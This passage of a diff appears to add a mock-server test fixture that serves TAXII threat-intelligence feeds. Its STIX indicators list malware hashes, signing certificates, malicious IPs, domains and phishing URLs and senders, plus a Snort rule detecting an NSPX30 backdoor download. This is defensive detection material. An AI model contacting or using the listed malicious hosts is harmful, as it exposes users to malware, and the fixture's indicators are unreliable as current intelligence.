|- + { + "more": true, + "objects": [ + { + "id": "indicator--5d7e9ad6-7b48-42fa-8598-d474e8da1b0f", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:38.000Z", + "modified": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "description": "Each of these file hashes indicates that a variant of HTML/Phishing.Agent.EVU trojan is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:38Z", + "valid_until": "2023-10-21T02:00:38Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--d491c790-d875-47d7-97fd-5ca2a7a1b2bc", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:38.000Z", + "modified": "2023-10-19T02:00:38.000Z", + "name": "b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7", + "description": "Each of these file hashes indicates that a variant of JS/Agent.PHC trojan is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'MD5'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:38Z", + "valid_until": "2023-10-21T02:00:38Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowNjozNy4xMzcwNjQrMDA6MDB8aW5kaWNhdG9yLS1kNDkxYzc5MC1kODc1LTQ3ZDctOTdmZC01Y2EyYTdhMWIyYmM=" + } + # IP + - path: 
/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/baaed2a92335418aa753fe944e13c23a/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--905fad40-d804-4b89-ac9d-b616e0b8f6d3", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:20:06.000Z", + "modified": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "description": "Web services scanning and attacks", + "pattern": "[ipv4-addr:value='5.2.75.227']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:20:06Z", + "valid_until": "2023-10-21T02:20:06Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--4cef7e20-7e22-41b9-97cc-33ce021c4e94", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:20:06.000Z", + "modified": "2023-10-19T02:20:06.000Z", + "name": "5.2.75.227", + "description": "Web services scanning and attacks", + "pattern": "[ipv4-addr:value='5.2.75.227']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:20:06Z", + "valid_until": "2023-10-21T02:20:06Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDoyMDoxMS44OTIyMzYrMDA6MDB8aW5kaWNhdG9yLS00Y2VmN2UyMC03ZTIyLTQxYjktOTdjYy0zM2NlMDIxYzRlOTQ=" + } + # MISP + - 
path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/97e3eb74ae5f46dd9e22f677a6938ee7/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "created": "2024-01-15T17:05:32.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--24fda7c8-a33c-4350-ba3f-495c887b9fe2", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2024-01-15T17:05:32.000Z", + "pattern": "[x509-certificate:hashes.MD5 = 'ed8893f16d887956e6a8a433645655fc' AND x509-certificate:hashes.SHA1 = '1ce0c3a55850c7e3f6b904b73e856e414b8293d1' AND x509-certificate:hashes.SHA256 = 'f62a815522470f8c12fac55510d367359f56aaadb530f63520df6c21a6c3c00a' AND x509-certificate:issuer = 'C=US, O=DigiCert\\\\, Inc., CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1' AND x509-certificate:serial_number = '0187a16b5e3a704b7fcab2598f50005a' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = '??=Private Organization, ??=CN, ??=, ??=, serialNumber=91370211065081921M, C=CN, ST=, L=, O=, CN=' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = 
'2022-11-29 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-29 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2024-01-15T17:05:32Z" + }, + { + "id": "indicator--00c84e90-4e2b-41a5-97e8-0b5f40cce015", + "type": "indicator", + "spec_version": "2.1", + "created": "2024-03-14T18:52:26.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2024-03-14T18:52:26.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '4ede38dcb043138971c429eaaa2d4696' AND x509-certificate:hashes.SHA1 = '28f9a8e7601f5338bf6e194151a718608c0124a8' AND x509-certificate:hashes.SHA256 = '23d13a8e48a6eff191a5d6a0635b99467c2e7242ae520479cae130fbd41cc645' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '0139dde119bb320dfb9f5defe3f71245' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=KR, ST=Seoul, O=Hangil IT Co.\\\\\\\\, Ltd, CN=Hangil IT Co.\\\\\\\\, Ltd' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-11-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2021-11-10 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2024-03-14T18:52:26Z" + }, + { + "created": "2023-11-17T19:00:49.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--16425bff-e5ba-4096-8883-0b340e892c45", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": 
"2023-11-17T19:00:49.000Z", + "pattern": "[x509-certificate:hashes.MD5 = '8ad6881721a82127b46fd5d07a1fab4b' AND x509-certificate:hashes.SHA1 = '9ebf592dd04da5274f1db1da41ab1434dd4c6aa1' AND x509-certificate:hashes.SHA256 = 'd3afddb5c8287ad7caf8bfe1dcc6be0cb4242f765ca9ee838c133736da43b324' AND x509-certificate:issuer = 'C=US, ST=Texas, L=Houston, O=SSL Corp, CN=SSL.com EV Code Signing Intermediate CA RSA R3' AND x509-certificate:serial_number = '47f49de6c7e29352e9f0775f68e15d8b' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.11' AND x509-certificate:subject = 'C=US, ST=North Carolina, L=Asheville, O=Level Software\\\\\\\\, Inc., OU=Information Security, serialNumber=7647497, CN=Level Software\\\\\\\\, Inc., ??=Private Organization, ??=Delaware, ??=US' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-09-19 11:51:47+00:00' AND x509-certificate:validity_not_before = '2022-09-20 11:51:47+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-11-17T19:00:49Z" + }, + { + "created": "2023-11-01T04:41:36.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--fe5a0018-b2dc-4102-a100-4632efc58ab4", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "Network activity" + } + ], + "labels": [ + "misp:type=\"snort\"", + "misp:category=\"Network activity\"" + ], + "modified": "2023-11-01T04:41:36.000Z", + "pattern": "[alert tcp any any -> any 80 \\\r\n (msg:\"Matches HTTP GET request by NSPX30's orchestrator when obtaining the backdoor.\"; gid:45534554; sid:45030002; rev:1;\\\r\n metadata: author \"ESET Research\", date \"2023-10-31\", hash \"82295E138E89F37DD0E51B1723775CBE33D26475\",\\\r\n copyright \"ESET Research\", distribution \"Distribution is forbidden. 
Do not upload to any multi-scanner or share on any threat intel platform.\";\\\r\n content: \"GET /id=\"; content: \"User-Agent: Mozilla/4.0 (compatible\\;MSIE 5.0\\; Windows 98)|0d 0a|Host: www.baidu.com|0d 0a|\";)]", + "pattern_type": "snort", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-11-01T04:41:36Z" + }, + { + "created": "2023-09-29T09:12:42.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--561b64fa-5223-46f9-8f6c-75cafe96b97b", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:12:42.000Z", + "pattern": "[domain-name:value = 'acertab.info']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-14T11:39:37Z" + }, + { + "created": "2023-09-29T08:48:51.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f8452e88-655f-4b5e-9812-2a1b3f5607cf", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"x509\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:51.000Z", + "pattern": "[x509-certificate:hashes.MD5 = 'ef36b08d59b9a6b2f538c1d24967fa23' AND x509-certificate:hashes.SHA1 = '0cd26ef0b232e6ed9910733e1d175a80a083aa08' AND x509-certificate:hashes.SHA256 = 'e4e82449c6a99740cd80fcc0368c93986bb3645fb6a9bfdae03e5d28ac4a66d8' AND x509-certificate:issuer = 'C=GB, O=Sectigo Limited, CN=Sectigo Public Code Signing CA R36' AND x509-certificate:serial_number = '3bd92ce9987095f74623d7c37e8d344e' AND x509-certificate:signature_algorithm = '1.2.840.113549.1.1.12' AND x509-certificate:subject = 'C=GB, ST=London, O=GREATIV LIMITED, 
CN=GREATIV LIMITED' AND x509-certificate:version = '3' AND x509-certificate:validity_not_after = '2024-05-09 23:59:59+00:00' AND x509-certificate:validity_not_before = '2023-05-10 00:00:00+00:00']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T08:48:51Z" + }, + { + "created": "2023-09-29T09:00:06.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--79d1df7c-8830-462d-bdf7-cea8a3911a01", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:00:06.000Z", + "pattern": "[file:hashes.MD5 = 'd7519b822434fb89fb3643bc2f450e23' AND file:hashes.SHA1 = '4fcf10a8fe9db80c3eaf172636a602f95b64b0fc' AND file:hashes.SHA256 = '732cfacaafe15f55c177d929eeb4b129dc5a44ce04c8d6d83da236d74c50979f']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T14:40:01Z" + }, + { + "created": "2023-09-29T09:00:10.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--d37cf6ca-e31f-421f-a7e0-4d1e48ba37d1", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T09:00:10.000Z", + "pattern": "[file:hashes.MD5 = '36b06d73347fe0da8177bd212e2b3f77' AND file:hashes.SHA1 = 'f1fc033763b931a729b9da3eb29a0724fd3eb6b9' AND file:hashes.SHA256 = 'a2f68aacf94a11678abd24039f1a26c65c257c26ac7c31c87b442fbd7f6583d9' AND file:name = 'fghsd.bat']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T19:07:41Z" + }, + { + "created": 
"2023-09-29T08:48:42.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a4cb9aa8-b12e-4141-ae33-509dfd9dd382", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:42.000Z", + "pattern": "[file:hashes.MD5 = '7196b26572d2c357a17599b9a0d71d33' AND file:hashes.SHA1 = 'a3ee3d4bc8057cfde073a7acf3232cfb3cbb10c0' AND file:hashes.SHA256 = '6c9eab41d2e06702313ee6513a8b98adc083ee7bcd2c85821a8a3136c20d687e' AND file:name = 'KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:parent_directory_ref.path = 'Comchit ltr no 4200 dt 23-09-2023' AND file:x_misp_fullpath = 'Comchit ltr no 4200 dt 23-09-2023/KihqQGHs7zYOxqqNE0b9zO4w6d7ysXUWrfDf6vLOAW4MU3Fs.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 07:03:56+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '6c744b262dbf76fb20346a93cbedbb0668c90b5bb5027485109e3cfb41f48d8c']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-26T07:00:04Z" + }, + { + "created": "2023-09-29T08:48:47.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f43fd42c-52d6-432e-a540-71cdc0f46cd9", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:47.000Z", + "pattern": "[file:hashes.MD5 = 'b8ef6fbfda87b44d969f338b958b2257' AND file:hashes.SHA1 = 'a85c7e14848013efb20469b35e8b70f1e447d54f' AND file:hashes.SHA256 = 
'354657aa58efe1da26989ef4182916cce77b0367d3a136f2b53b23edf239ff14' AND file:name = 'kafil.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 'd6fe0b6872f80fca2efdb7ab10124297' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-18 05:12:45+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '1533427735186cdf43ffb09e53cfe0072393c3651791301e6723957100d481e3']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-19T12:07:09Z" + }, + { + "created": "2023-09-29T08:48:51.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--e35b97a0-a1a2-4362-bcb5-6ba7923be65a", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:48:51.000Z", + "pattern": "[file:hashes.MD5 = '2995a24f6bb7eef7824a5e309fbb3443' AND file:hashes.SHA1 = 'bd1dc1b52d55c6b236b1c768353666be962109a6' AND file:hashes.SHA256 = '5043d5af8b887cd73cbd016844514b945c31131714cf662c03ae8f229ef92981' AND file:name = 'Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:parent_directory_ref.path = 'Letter Outward No 1514' AND file:x_misp_fullpath = 'Letter Outward No 1514/Zx6evXzwVZxif146HetzZpkV3K2ODDl6WymohacBjaPqyq2Z.mp3' AND file:extensions.'windows-pebinary-ext'.imphash = 'fcab131627362db5898b1bcc15d7fd72' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-11 07:50:16+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '01a392201f4c58b1fc3630669ed269df858ec78a6fe1050fb24d32b1b33bd58c']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": 
"indicator", + "valid_from": "2023-09-14T11:39:37Z" + }, + { + "created": "2023-09-29T08:59:10.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--9ddd947c-bd18-479f-a8c1-2cb9e6b94f59", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:59:10.000Z", + "pattern": "[file:hashes.MD5 = '7c3c16981350845838d6f69f50568434' AND file:hashes.SHA1 = 'afcc824bd83676badd5712dbfac1c61468480d54' AND file:hashes.SHA256 = '1a27ffd32ba6f4d08a95105be3f2caee6245fe427e0b534e07f446881296b99e' AND file:name = 'as.dll' AND file:extensions.'windows-pebinary-ext'.imphash = '7e40594946c0c9f8153242b822cd655e' AND file:extensions.'windows-pebinary-ext'.pe_type = 'dll' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-25 06:59:18+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = '2b01fca027096cda8ed7f168621a9ee485eef04cf7e9099590d97e798d1e165a']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-25T08:02:07Z" + }, + { + "created": "2023-09-29T08:59:50.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--5bfb70d8-69b0-49a8-aaf5-3fcd9a59b41a", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T08:59:50.000Z", + "pattern": "[file:hashes.MD5 = 'f4671beb11a28846a53f81ac1ba333e4' AND file:hashes.SHA1 = '3c4efa52fcfa42f0dccaee70cec7462811fb7b06' AND file:hashes.SHA256 = 'e130d70679e8ac82383d7a2d2e0faaf799d394a39c4df87f955f5da590fd6605' AND file:name = 'PassCat.exe' AND file:extensions.'windows-pebinary-ext'.imphash = 
'9dab9f23fae6ad65306a199dde7e7b03' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2023-09-05 11:47:35+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'f12714cb47ff720487d41c8edb874ddf9ccffc5baa9b36d6d54bb6ea8b70e5d4']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-07T09:01:06Z" + }, + { + "created": "2023-10-03T13:20:09.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--c2d3ca78-8832-4f2c-a770-59184731baf5", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T13:20:09.000Z", + "pattern": "[domain-name:value = 'anguisbi.ru']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-07T06:13:58Z" + }, + { + "created": "2023-10-03T13:20:52.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--fd162f17-3d98-4129-9574-06ecdf733f6f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T13:20:52.000Z", + "pattern": "[url:value = 'http://134.209.223.199' AND url:x_misp_scheme = 'http' AND url:x_misp_port = '80']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-08T06:31:14Z" + }, + { + "created": "2023-10-03T11:49:09.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--cdc79d14-87bc-4011-b371-55fef054e1bd", + "kill_chain_phases": [ 
+ { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T11:49:09.000Z", + "pattern": "[file:hashes.MD5 = '376002acdf350488c4a3cb5c75e8bbf1' AND file:hashes.SHA1 = '654f86929a79700157f1ea10db4abe2d3e2be4e9' AND file:hashes.SHA256 = '460ebe2c3f45cac68a485f80cf3d33e08301df0e7d0f17fe3943debe512a0583' AND file:extensions.'windows-pebinary-ext'.imphash = '318afb7c57acecbbf5ad0df6b8baf133' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2010-11-08 12:27:29+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_authentihash = 'dbb3f575e62986974e9e20cbe57226f73f630fb59d547b99d37ca0bcc247d33b' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oleg N. Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = '7z Setup SFX (x86)' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00a9 2005-2010 Oleg N. 
Scherbakov' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = '7-Zip SFX' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '1.5.0.1929' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = '7ZSfxMod_x86.exe' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = '7ZSfxMod' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '000004b0']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-27T05:34:03Z" + }, + { + "created": "2023-09-29T19:44:05.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--8ea4a915-b7d5-448c-91f9-1f328102f800", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "Network activity" + } + ], + "labels": [ + "misp:type=\"email-dst\"", + "misp:category=\"Network activity\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T19:44:05.000Z", + "pattern": "[email-message:to_refs[*].value = 'joannburke1987@portugalmail.pt']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T19:44:05Z" + }, + { + "created": "2023-09-29T17:58:54.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--f89cd8e8-3dfa-4157-bb4d-33ee9d7e054c", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"email\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-09-29T17:58:54.000Z", + "pattern": "[email-message:from_ref.value = 'katecohen1984@portugalmail.pt' AND email-message:subject = 'Hackers Leak Explicit Photos of More Than 100 Government workers']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T00:00:00Z" + }, + { + 
"created": "2023-10-02T07:41:04.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--d9a10671-eb84-4039-8211-277c14104b39", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"url\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T07:41:04.000Z", + "pattern": "[url:value = 'https://microsoft-update-com.github.io/kb5021042/' AND url:x_misp_scheme = 'https' AND url:x_misp_resource_path = '/kb5021042/' AND url:x_misp_port = '443']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-28T00:00:00Z" + }, + { + "created": "2023-10-02T07:58:05.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--696f64c3-733b-4cba-8757-e0cb99142ffa", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"email\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T07:58:05.000Z", + "pattern": "[email-message:x_misp_return_path = 'rosalawson1960@portugalmail.pt']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-10-02T07:58:05Z" + }, + { + "created": "2023-10-03T08:15:57.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--a444021f-5c0a-4b59-a7af-c451edf05c2f", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "file" + } + ], + "labels": [ + "misp:name=\"file\"", + "misp:meta-category=\"file\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-03T08:15:57.000Z", + "pattern": "[file:hashes.MD5 = '8a4c807caea1cd9d3552bed916320ee6' AND file:hashes.SHA1 = '5438e26e5f7d819ef4fcd39b84e575f4c452f234' AND file:hashes.SHA256 = 
'06e9dd33655ebc062a4236f2611403688baf0711b5a02acc45216ae853fad607' AND file:name = 'install-kb-5021042.cmd']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": "2023-09-29T10:46:00Z" + }, + { + "created": "2023-10-02T13:48:17.000Z", + "created_by_ref": "identity--55f6ea5e-51ac-4344-bc8c-4170950d210f", + "id": "indicator--8444ce6b-3c9e-4363-819a-5f64a238bcc7", + "kill_chain_phases": [ + { + "kill_chain_name": "misp-category", + "phase_name": "network" + } + ], + "labels": [ + "misp:name=\"domain-ip\"", + "misp:meta-category=\"network\"", + "misp:to_ids=\"True\"" + ], + "modified": "2023-10-02T13:48:17.000Z", + "pattern": "[domain-name:value = 'billyconsult.com' AND domain-name:value = 'billyconsult.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "spec_version": "indicator", + "type": "indicator", + "valid_from": 